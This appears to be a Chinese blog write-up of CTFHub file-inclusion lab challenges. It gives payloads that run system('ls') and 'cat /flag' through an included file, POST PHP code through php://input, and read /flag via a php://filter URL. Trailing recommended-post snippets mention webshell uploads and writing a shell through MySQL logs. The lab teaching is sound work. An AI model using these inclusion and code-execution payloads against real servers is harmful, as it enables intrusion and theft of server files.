ctfhub文件包含

于 2024-08-07 17:31:02 发布
阅读量218 收藏 3
点赞数 6
文章标签: android 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a666666688/article/details/140997254
版权

文件包含

url

http://challenge-41cbfbe04828b338.sandbox.ctfhub.com:10800/

构造url,利用hackabar进行Post data修改测试

http://challenge-41cbfbe04828b338.sandbox.ctfhub.com:10800/?file=shell.txt
ctfhub=system("ls");

ctfhub=system("ls /"); //查看根目录

ctfhub=system("cat /flag"); //查看flag

php://input

burp抓包构造payload

<?php system("ls");?>

查看根目录

查看flag文件

远程包含

开启靶场访问页面

可能存在文件包含漏洞

点击phpinfo,查看allow的两个选项是否开启

抓包测试

发送到repeter模块,构造payload

查看文件
<?php system("ls /"); ?>

查看flag文件内容,找到flag

读取源代码

查看页面

构造url读取flag

http://challenge-706aaf4604cfa60f.sandbox.ctfhub.com:10800/?file=php://filter/resource=/flag
  1. 基本结构
    • http://challenge-706aaf4604cfa60f.sandbox.ctfhub.com:10800/:这是目标服务器的基本URL。
    • ?file=:这是一个查询参数,表明我们要访问某个文件。
  1. 流封装器部分
    • php://filter/:这是PHP的流封装器,用于应用不同的过滤器来操作流数据。
  1. 过滤器部分
    • resource=:这是php://filter封装器的一种模式,表示要对指定的资源应用过滤器。
    • /flag:这是实际的文件路径,表明我们想要读取的文件是/flag

详细分析:

  • php://filter
    • PHP中的php://filter流封装器允许我们在读取或写入数据时应用过滤器。
    • 通常,我们会在php://filter之后指定过滤器(如base64编码、转换为字符串等),然后指定资源。
  • resource=/flag
    • 这里没有指定具体的过滤器,仅使用resource=,意思是直接访问资源文件。
    • 目标文件是/flag,这个文件通常存储在服务器上,需要通过某种方式读取其内容。

实际读取过程:

  • 当服务器处理这个URL时,它会解析file参数并使用指定的流封装器。
  • php://filter/resource=/flag会被解释为:直接访问并读取/flag文件的内容。

假设服务器没有进一步的安全检查或限制,直接访问这个URL将导致服务器读取并返回/flag文件的内容。这样就可以通过浏览器或其他HTTP客户端看到/flag文件的内容,通常这个文件包含一些敏感信息,比如CTF比赛中的flag。

示例流程:

  1. 你访问这个URL。
  2. 服务器收到请求,解析查询参数file=php://filter/resource=/flag
  3. 服务器使用PHP的流封装器读取/flag文件的内容。
  4. 文件内容作为HTTP响应的主体返回给你。

fasewer
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctfhub web全部做题记录(持续跟新)
01-08
【备份文件下载】备份文件往往包含有价值的信息,如网站源码。可以尝试爆破常见的备份文件名,如`.tar`, `.tar.gz`, `.zip`, `.rar`等,或者使用自动化工具如`dirsearch`进行目录扫描。 【源码解析与爆破】如果源码...
ctfhub:一些用于CTF环境的Docker
05-14
CTFhub — 基于Docker的CTF学习环境0x00 前言CTFhub是面向所有学习CTF的朋友的环境,不用了解docker原理及知识,仅仅简单执行几条命令即可完成整个平台的搭建。0x01 搭建环境使用CTFhub中的环境的前提条件需要在本地...
CTFHUB文件包含
2201_75447904的博客
04-04 673
但需要注意的是,由于安全原因,大多数浏览器对file://协议有一些限制,例如不允许跨域访问、限制JavaScript执行等,以防止恶意网站利用file://协议进行攻击。而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。: 如果GET参数'file'以"php://"开头,则直接包含用户指定的文件。
ctfhub文件包含·原形毕露
Chenge218的博客
01-03 1036
ctfhub文件包含 :你的shell是个寂寞?
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 566
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
CTFHub | 远程包含
尼泊罗河伯的博客
06-13 2203
远程文件包含(Remote File Inclusion,简称RFI)是一种常见的安全漏洞,它可以允许攻击者远程执行恶意代码或获取敏感信息。攻击者可以通过利用应用程序中易受攻击的包含程序来引入远程文件,这些文件通常包含恶意代码或其他危险的操作。如果应用程序没有正确处理和验证用户输入,那么攻击者就可以通过注入恶意代码来利用这个漏洞。
CTFHub | 文件包含
尼泊罗河伯的博客
05-16 1216
简单分析网页显示内容中的源代码,可以发现一处代码include $_GET["file"] ,其中 include 语句可以动态地包含用户发送的GET 请求。详细的方法将在后续的内容中进行逐步解释。
CTFHUB RCE——文件包含
winofkill的博客
12-11 6267
1.文件包含 首先我们开启题目 看到的是一大串代码 我们仔细看一下php代码,重点是 if(!strpos($_GET["file"],"flag")){ include$_GET["file"]; 这里有一个strpos(string,find,start)函数 意思在string字符串中找find的位置,start是查找的开始位置 那么这句代码的意思就是如果file中没有flag字符串就执行下面的include$_GET["file"] 否则...
ctfhub-文件包含
At0m的博客
01-13 1446
ctfhub-文件包含 可以看到里面有一个include() 函数。 首先需要了解一下,什么是include() 的函数。 通过 include 或 require 语句,可以将 PHP 文件的内容插入另一个 PHP 文件(在服务器执行它之前)。 效果就是如图所示: 将 footer.php的内容 Copyright © 2006-2021 W3School.com.cn包含到 main.php中,然后<?php echo "<p>Copyright © 2006-" . date("
CTFHub靶场:文件包含
NSQ0207的博客
07-28 200
题目告诉说flag不能直接被包含,但是下面有一个shell.txt,密码是。如果文件名前六个如果是:php://则执行include包含函数。所以我们直接使用 php://filter。
CTF-hub文件包含漏洞
qq_50605865的博客
04-16 2312
第一个文件包含,先审计代码 ls查看一下 尝试找带有“flag”字样的文件,找到了 查看flag,得到flag php:input 还是先审计代码,在url栏发一个input用bp拦截 这里我们把GET类型改为POST类型 末行加入一行PHP 执行ls 找到flag文件后 cat /flag_xxxxx查看 得到flag 远程包含漏洞 审计代码,发一个input用bp拦截 还是改包,查找 找到flag文件,查看得到flag ...
3.18号日报,ctfhub中web,文件上传漏洞题目解法
03-18
本文将基于标题“3.18号日报,ctfhub中web,文件上传漏洞题目解法”以及描述“文件上传漏洞”,详细介绍几种典型的文件上传漏洞利用方法及其技术细节。 #### 一、无验证直接上传一句话木马 这类题目是最简单的,...
CtfHub-wp(web)
01-23
`.htaccess`文件是Apache服务器上的一个配置文件,允许对目录及其子目录进行配置,包括重定向、错误处理、文件解析等。通过创建`.htaccess`文件并设置特定规则,可以使得某些文件以PHP方式执行。MIME类型校验绕过是...
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
Android 在布局中tools使用
最新发布
追梦的鱼儿
08-06 217
在布局中因为各种原因,有时想让控件不显示,或者显示占位图的话,可以使用。
Android 制作系统签名
shi450561200的博客
08-03 297
注意:基于AOSP源码制作的test key文件,一般无法使用在真实环境中(例如:手机),车载项目则较为复杂,有的项目在开发阶段,就会使用较为严格的签名校验,那么AOSP的签名文件也是无法使用的。将系统签名引入android studio后,app工程就可以直接在Android模拟器中调用系统API,同时也可以获取更高等级的权限了。制作完成后,会在当前目录下载生成一个platform.jks的签名文件,将它导入到android studio中即可对应用进行签名。
Android进阶之路 - 字体加粗,定制化字体粗度
Android、前端、小程序、后端
08-06 731
在客户端中不论是PC端,还是移动端主要价值之一就体现在用户交互方面,也就是用户体验了,接下来讲的是很常见的字体加粗问题
常见的CMS漏洞
C233333235的博客
08-03 495
通过⽇志⽂件拿Shell 利⽤mysql⽇志⽂件写shell,这个⽇志可以在mysql⾥改变它的存放位置,登录phpmyadmin可以修改 这个存放位置,并且可以修改它的后缀名。查到数据库位置后,就可以大概猜测一下网站的根目录,一般www目录在phpstudt_pro下,是Extensions的同级目录。以确认我们的修改生效了,修改成功后,日志文件的后缀就被修改成了php,那么其中的php语句就会被运行。这样日志文件中就会有这个一句话木马的字样,我们去访问日志文件后,就可以进行连接获取shell。
CTFHUB文件上传
09-06
文件上传是一种将文件从客户端上传到服务器的过程。在CTFHUB中,文件上传可以用来绕过安全限制并获取敏感信息。有几种常见的方法可以进行文件上传,包括.htaccess上传、.php木马文件上传和文件名后缀双写绕过。 在.htaccess上传方法中,首先上传.htaccess文件,然后上传的文件都会解析为php文件。可以将一个.php文件改成.png文件上传,并返回上传成功的路径。可以使用蚁剑等工具连接服务器,并获取flag。这种方法可以绕过MIME类型限制。 另一种方法是直接上传.php木马文件,由于没有任何限制,可以直接上传成功,并显示上传文件的相对路径。同样可以使用蚁剑等工具连接服务器,***例如将上传文件的后缀改为phphpp,上传成功后可以返回路径。如果发现文件后缀是hpp,则需要重新更改后缀再次上传。同样可以使用蚁剑等工具连接服务器,并获取flag。这种方法可以绕过后缀限制。 总结来说,CTFHUB文件上传可以***连接服务器,并获得flag。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFHub_文件上传](https://blog.csdn.net/weixin_47443077/article/details/119453421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值